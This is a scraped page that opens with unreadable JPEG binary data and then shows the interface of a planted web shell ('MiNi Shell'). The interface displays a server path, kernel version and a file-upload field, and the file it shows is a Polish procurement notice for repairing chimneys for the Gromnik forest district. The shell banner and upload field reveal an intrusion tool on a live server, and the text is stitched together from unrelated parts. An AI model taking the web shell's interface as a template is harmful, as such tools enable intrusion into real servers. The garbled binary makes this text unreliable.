JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210831/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210831/0016490901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont kominów na budynku mieszkalnym dwurodzinnym w m. Gromnik </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">NADLEŚNICTWO GROMNIK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 350545576</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">GENERAŁA ANDERSA 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gromnik</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-180</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL217 - Tarnowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">146514205</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">146515081</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gromnik@krakow.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">gromnik.krakow.lasy.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Leśnictwo </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont kominów na budynku mieszkalnym dwurodzinnym w m. Gromnik </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-977997ee-0a37-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00164909</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lasy_gromnik <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu platformy platformazakupowa.pl oraz poczty<br/>elektronicznej, z zastrzeżeniem, że złożenie Oferty następuje wyłącznie przy użyciu platformazakupowa.pl. Za datę przekazania oferty przyjmuje się datę jej złożenia na platformie<br/>platformazakupowa.pl. Za datę przekazania wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się<br/>datę ich przekazania na adres poczty elektronicznej Zamawiającego lub złożenia na platformie platformazakupowa.pl. Komunikacja pomiędzy Zamawiającym a Wykonawcami, w tym w szczególności<br/>składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza Wyślij wiadomość dostępnego na platformie platformazakupowa.pl oraz poczty elektronicznej e- mail: gromnik@krakow.lasy.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego lub konkursie (Dz.U.2020.2452) określa niezbędne wymagania techniczne umożliwiające pracę na platformie platformazakupowa.pl tj.<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2<br/>GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8, g)<br/>oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.<br/>Ofertę sporządza się pod rygorem nieważności, w postaci elektronicznej i opatruje się kwalifikowanym<br/>podpisem elektronicznym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L<br/>119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych osobowych<br/>jest Nadleśnictwo Gromnik z siedzibą: 33-180 Gromnik, ul. Generała Andersa 1, tel. (14) 65-15-081,<br/>adres e-mail: gromnik@krakow.lasy.gov.pl<br/>Z Inspektorem ochrony danych w Nadleśnictwie Gromnik można skontaktować się poprzez e-mail:<br/>iod@comp-net.pl<br/>Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie zamówienia<br/>publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.<br/>Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia<br/>korzystania ze środków ochrony prawnej, o których mowa w dziale IX PZP, do upływu terminu do ich<br/>wniesienia.<br/>Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja postępowania<br/>zostanie udostępniona w oparciu o art. 18-19 oraz 74-76 PZP.<br/>Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie<br/>zamówienia publicznego będą przechowywane, zgodnie z art. 78 ust.1 PZP, przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie zamówienia<br/>publicznego.<br/>Niezależnie od postanowień powyżej, w przypadku zawarcia umowy w sprawie zamówienia<br/>publicznego, dane osobowe będą przetwarzane do upływu okresu przedawnienia roszczeń<br/>wynikających z umowy w sprawie zamówienia publicznego.<br/>Osoba, której dotyczą pozyskane w związku z prowadzeniem niniejszego postępowania dane<br/>osobowe, ma prawo:<br/>1) dostępu do swoich danych osobowych – zgodnie z art. 15 RODO, przy czym w sytuacji, gdy<br/>wykonanie obowiązków, o których mowa w art. 15 ust. 1 -3 RODO wymagałoby niewspółmiernie<br/>dużego wysiłku Zamawiający może żądać wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty bieżącego bądź zakończonego<br/>postępowania o udzielenie zamówienia publicznego;<br/>2) do sprostowana swoich danych osobowych – zgodnie z art. 16 RODO, przy czym skorzystanie z<br/>uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 RODO,<br/>nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego, ani zmianą<br/>postanowień umowy w zakresie niezgodnym z PZP oraz nie może naruszać integralności protokołu<br/>oraz jego załączników;<br/>3) do żądania od Zamawiającego – jako administratora, ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego; prawo to nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>postępowania o udzielenie zamówienia publicznego;<br/>4) wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w przypadku uznania, iż przetwarzanie jej danych osobowych narusza przepisy o ochronie danych osobowych, w tym przepisy<br/>RODO.<br/>Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych lub innych podmiotów upoważnionych na podstawie przepisów prawa lub wykonujących zadania realizowane w<br/>interesie publicznym lub w ramach sprawowania władzy publicznej, w szczególności do podmiotów prowadzących działalność kontrolną wobec Zamawiającego</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Osobie, której dane osobowe zostały pozyskane przez<br/>Zamawiającego w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia<br/>publicznego nie przysługuje:<br/>1) prawo do usunięcia danych osobowych, o czym przesądza art. 17 ust. 3 lit. b, d lub e RODO,<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>3) określone w art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, a to z uwagi na fakt, że podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">S.270.14.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 13680,88 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest robota budowlana polegająca na remoncie czterech kominów na<br/>budynku mieszkalnym dwurodzinnym. Zamówienie obejmuje remont czterech kominów na<br/>budynku mieszkalnym dwurodzinnym. Planowane są następujące prace do wykonania:<br/>Roboty rozbiórkowe:<br/>- rozbiórka czterech kominów w części nad połacią dachową oraz w przestrzeni poddasza do 30<br/>cm poniżej dachu,<br/>- demontaż obróbek blacharskich kominów,<br/>- demontaż istniejącej instalacji odgromowej,<br/>- demontaż nasad oraz ustników istniejących rur spalinowych,<br/>- demontażu anteny.<br/>Podczas demontażu należy zachować szczególną ostrożność i przestrzegać warunki BHP w<br/>tym<br/>zakresie.<br/>Kominy:<br/>- wymurowanie nowych kominów z cegły klinkierowej w kolorze wiśni zbliżonym do RAL 3005<br/>zgodnie z częścią rysunkową projektu<br/>- wykonanie czap zabezpieczających kominy z cegły klinkierowej w kolorze wiśni zbliżonym do<br/>RAL 3005 zgodnie z częścią rysunkową projektu,<br/>- odtworzenie obróbek blacharskich na kominach, obróbki blacharskie systemowe z blachy<br/>powlekanej gr. 0,8 mm z kolorem dostosowanym do koloru istniejącego pokrycia dachu,<br/>- wyposażenie kominów w zabezpieczające nasady dostosowane do rodzaju przewodu,<br/>- wymiana nasad oraz ustników istniejących rur spalinowych,<br/>- odtworzenie instalacji odgromowej,<br/>- ponowny montaż anteny.<br/>Wszystkie roboty objęte kontraktem powinny być wykonane zgodnie z obowiązującymi normami,<br/>sztuką budowlaną, dokumentacją projektową, udzielonymi pozwoleniami na budowę, przepisami<br/>BHP, przepisami p.poż oraz przepisami o ochronie środowiska a także wymaganiami<br/>technicznymi dla poszczególnych rodzajów robót wyszczególnionych w przedmiarze i<br/>zaleceniami Zamawiającego. Odpowiedzialność za jakość wykonywania wszystkich rodzajów<br/>robot wchodzących w skład zadania w całości ponosi Wykonawca.Odpady i nadmiar materiałów<br/>pochodzący z prac budowlanych przechodzą na własność Wykonawcy i jest on zobowiązany<br/>usunąć je z terenu budowy oraz postąpić z nimi zgodnie z obowiązującymi przepisami.<br/>Wykonawca zobowiązuje się do usuwania odpadów zgodnie z obowiązującymi przepisami<br/>prawa,<br/>w szczególności ustawą z dnia 14 grudnia 2012r. o odpadach ( tj. Dz. U. 2021r. poz. 779 ze zm.<br/>) oraz ustawą<br/>z dnia 27 kwietnia 2001r. Prawo ochrony środowiska ( tj. Dz. U. 2020r. poz. 1219 ze zm.).<br/>Wykonawca jest zobowiązany przedłożyć Zamawiającemu dowód utylizacji odpadów.<br/>Do obowiązków Wykonawcy należy:<br/>- na własny koszt wykona oznakowanie i zabezpieczenie miejsc prowadzenia prac na czas<br/>realizacji robót.,<br/>- opracowanie projektu zagospodarowania placu budowy, projektu organizacji i zabezpieczenia<br/>robot w czasie<br/>trwania budowy.<br/>- przejęcie placu budowy, zabezpieczenie i oznakowanie zgodnie z wymogami prawa<br/>budowlanego. Treść tablic i miejsce ustawienia należy uzgodnić z inwestorem. Wykonawca<br/>ponosi pełną odpowiedzialność za utrzymanie<br/>placu budowy, od momentu przejęcia placu budowy do odbioru końcowego. W miarę postępu<br/>robot, plac budowy powinien być porządkowany, usuwane zbędne materiały, sprzęt i<br/>zanieczyszczenia.<br/>- zorganizowanie terenu budowy<br/>- zabezpieczenie dostawy mediów<br/>- ochrona środowiska na placu budowy i poza jego obrębem powinna polegać na<br/>zabezpieczeniach przed:<br/>a) zanieczyszczeniem gleby przed szkodliwymi substancjami, a w szczególności: paliwem,<br/>olejem, chemikaliami.<br/>b) zanieczyszczeniem powietrza gazami i pyłami,<br/>c) możliwością powstania pożaru,<br/>- niszczeniem drzewostanu na terenie budowy i na terenie przyległym<br/>- ochrona istniejących urządzeń podziemnych i naziemnych. Przed rozpoczęciem robot budowlanych wykonawca ma obowiązek zabezpieczyć wszelkie instalacje przed uszkodzeniem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-10-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi<br/>kryteriami oceny:<br/>1) Cena - 60 %,<br/>2) Okres gwarancji - 40%,<br/>Sposób obliczania punktów dla poszczególnych kryteriów:<br/>1) W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>Cn<br/>C = ------------ x100 pkt x 60 %<br/>Co<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto za wykonanie całego<br/>Przedmiotu zamówienia podana w formularzu oferty.<br/>W tym kryterium Wykonawca może uzyskać maksymalnie 60 punktów.<br/>2) Kryterium okresu gwarancji (G) – waga 40% ( 1% - 1 pkt)<br/>Sposób obliczania punktów dla ww. kryterium:<br/>Maksymalna ilość punktów możliwa do uzyskania w kryterium okresu gwarancji wynosi 40 pkt<br/>Gwarancja w miesiącach Liczba punktów<br/>60 0<br/>66 20<br/>72 40<br/>Sposób obliczenia punktów dla kryterium okres gwarancji jakości:<br/>a) Kryterium gwarancji jakości na całość zamówienia będzie rozpatrywane na podstawie<br/>zadeklarowanego w formularzu ofertowym okresu gwarancji jakości;<br/>b) Najkrótszy możliwy okres gwarancji wymagany przez Zamawiającego to 60 miesięcy liczonych od<br/>daty ostatecznego odbioru robót przy czym bieg gwarancji rozpoczyna się z datą bezusterkowego<br/>odbioru protokołu końcowego;<br/>c) Najdłuższy możliwy okres gwarancji jaki będzie uwzględniany przy ocenie oferty to okres 72<br/>miesiące;<br/>d) Wykonawca może zaproponować okres gwarancji jakości w pełnych miesiącach tj. 60, 66, 72,<br/>miesiące. Jeżeli Wykonawca wpisze okres gwarancji krótszy niż 60 miesięcy to przygotuje ofertę<br/>niezgodnie z SWZ, co skutkować będzie odrzuceniem oferty. W przypadku nie wypełnienia w<br/>formularzu ofertowym stosownej rubryki Zamawiający uzna, że Wykonawca deklaruje najkrótszy, tj. 60<br/>miesięczny okres gwarancji jakości.<br/>Za najkorzystniejszą ofertę zostanie uznana oferta, która uzyskała łącznie najwyższą liczbę punktów<br/>obliczoną wg następującego wzoru:<br/>S= C+G<br/>gdzie:<br/>S - łączna liczba punktów jaką uzyskała oceniana oferta<br/>C - liczba punktów przyznanych ocenianej ofercie w ramach kryterium cena<br/>G - liczba punktów przyznanych ocenianej ofercie w kryterium okresu gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu;<br/>2) spełniają warunki udziału w postępowaniu określone przez Zamawiającego w zakresie:<br/>2.1 kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów - Zamawiający nie stawia w tym zakresie żadnych wymagań. <br/>2.2 sytuacji ekonomicznej lub finansowej - Zamawiający nie stawia w tym zakresie żadnych wymagań. <br/>2.3 zdolności technicznej lub zawodowej:<br/>I) w zakresie doświadczenia: Zamawiający nie precyzuje w tym zakresie warunku. Wykonawca potwierdza spełnienie tego warunku przez złożenie oświadczenia (załącznik 1).<br/>II) w zakresie potencjału technicznego: Zamawiający nie precyzuje w tym zakresie warunku. Wykonawca potwierdza spełnienie tego warunku przez złożenie oświadczenia (załącznik 1).<br/>III) W zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia: Warunek ten, w zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia, zostanie uznany za<br/>spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej 1 osobą uprawnioną zgodnie z wymogami Prawo budowlane (Dz. U. z 2010 nr 243 poz.1623 z póź. zm.)<br/>do pełnienia samodzielnych funkcji technicznych w budownictwie tj.:<br/>I) kierownika robót/budowy, posiadającą uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej lub równoważnej, posiadający minimum 2-lata doświadczenia zawodowego (liczonego od dnia uzyskania uprawnień) przy pełnieniu samodzielnych funkcji technicznych w budownictwie na stanowisku<br/>kierownika budowy lub robót dla danej specjalności ,które będą uczestniczyć w wykonywaniu zamówienia;<br/>Zamawiający na podstawie art. 116 ust. 2 Pzp może na każdym etapie postępowania uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych<br/>lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na 